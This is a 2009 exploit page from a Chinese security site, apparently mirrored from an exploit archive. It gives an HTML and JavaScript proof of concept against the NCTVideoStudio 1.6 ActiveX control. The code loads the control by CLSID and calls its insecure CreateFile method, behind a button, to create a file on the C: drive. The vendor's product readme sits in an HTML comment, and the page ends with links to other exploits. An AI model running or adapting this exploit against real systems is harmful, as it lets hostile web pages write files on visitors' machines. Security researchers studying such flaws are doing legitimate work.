首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NCTVideoStudio ActiveX DLLs 1.6 Insecure Method File Creation Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
<HTML>
<b> NCTVideoStudio ActiveX DLLs Version 1.6 Insecure Method File Creation </b>
<b>   <br/><br/>
 Author : Mountassif Moad a.k.a Stack    <br/>  <br/>  <br/>
 
<b/>
RegKey Safe for Script: False<br/>
RegKey Safe for Init: False<br/>
Implements IObjectSafety: True<br/>
IDisp Safe:  Safe for untrusted: caller,data  <br/><br/><br/>
<!--  
       Read Me :d:)
       NCTVideoStudio is the package of ActiveX DLL's, which is intended for work with video data.
      NCTVideoStudio includes the following ActiveX DLL's:
    - NCTAudioFile2 which allows you to read and write audio files;
    - NCTAudioRecord2 which allows you to record audio from any audio source device installed in the system;
    - NCTAudioPlayer2 which allows you to play audio data;
    - NCTAudioTransform2 which allows you to apply various effects and transformations to audio data;
    - NCTImageFile which allows you to load and save image files;
    - NCTVideoCompose which allow you to compose video frames using specified effects;
    - NCTVideoCompress which allows you to compress video frames in memory;
    - NCTVideoDxCapture which allows you to capture video and audio from any video source devices (including DV cameras, Webcams and TV tuners);
    - NCTVideoDxPlayer which allows you to preview video files;
    - NCTVideoFile which allows you to read and write video files of various formats;
    - NCTVideoPlayer  which allow you to playback video file;
    - NCTVideoTransform  which allows you to apply different photographic filters, effects, transformations to video frames;
    - NCTVideoView which allows you to visualize video frames;
    - NCTWMVBroadcast which allow you to broadcast video data via network;
 
    - under Windows 98/Me/NT/2000/XP
------------------------------------------------------------------------------------------------
INSTALLATION:
  run NCTVideoStudio.exe
------------------------------------------------------------------------------------------------
SYSTEM REQUIREMENTS:
  Any Win32 based platform (except WinCE);
  Any developer environment which supports COM objects manipulation;
------------------------------------------------------------------------------------------------
SUPPORT:
 You can send any questions, comments and suggestions to support@nctsoft.com
------------------------------------------------------------------------------------------------
INFORMATION:
 Visit main product page at http://www.nctsoft.com/products/NCTVideoStudio/
------------------------------------------------------------------------------------------------
hats new in Release 1.4.1
The general features of NCTVideoStudio news are:
New control for video data broadcast (NCTWMVBroadcastService).  It allows to broadcast video data via network.
New control for video composing (NCTVideoCompose).  It allows to compose video frames using specified effects.
Some changes in the NCTVideoFile control:
New methods
        GetKeyFrameCount;
        GetKeyFrameNum;
        IsKeyFrame;
Modified method
        SetAVIAudioFormatPCM;
Modified event
        ParsingVideoFile;
Change in the NCTVideoTransform control:
added the EffectDeinterlace method.
Fixed founded bugs.
 -->
<BODY>
<object classid='clsid:6ED74AE3-8066-4385-AABA-243E033F75A3' id='test'></object>
<SCRIPT>
/*
RegKey Safe for Script: khatae
RegKey Safe for Init: khatae
Implements IObjectSafety: Sahih
IDisp Safe:  Safe for untrusted: caller,data 
*/
function Mm()
 {
     File = "c:\\system_.ini"
   test.CreateFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Mm() type=button value="Click Here For Test Exploit"><br>
</body>
</HTML>

# [2009-01-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HtmlCapture ActiveX Control 2.
·E-ShopSystem Auth Bypass / SQL
·MW6 Barcode ActiveX (Barcode.d
·Script Toko Online 5.01 (shop_
·FlexCell Grid Control 5.6.9 Re
·SHOP-INET v4 (show_cat2.php gr
·ITLPoll 2.7 Stable2 (index.php
·WinFTP 2.3.0 (LIST) Remote Buf
·Simple Machines Forum <= 1.1.7
·PHP-CMS 1 (username) Blind SQL
·SunOS Release 5.11 Version snv
·Wazzum Dating Software (userid
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved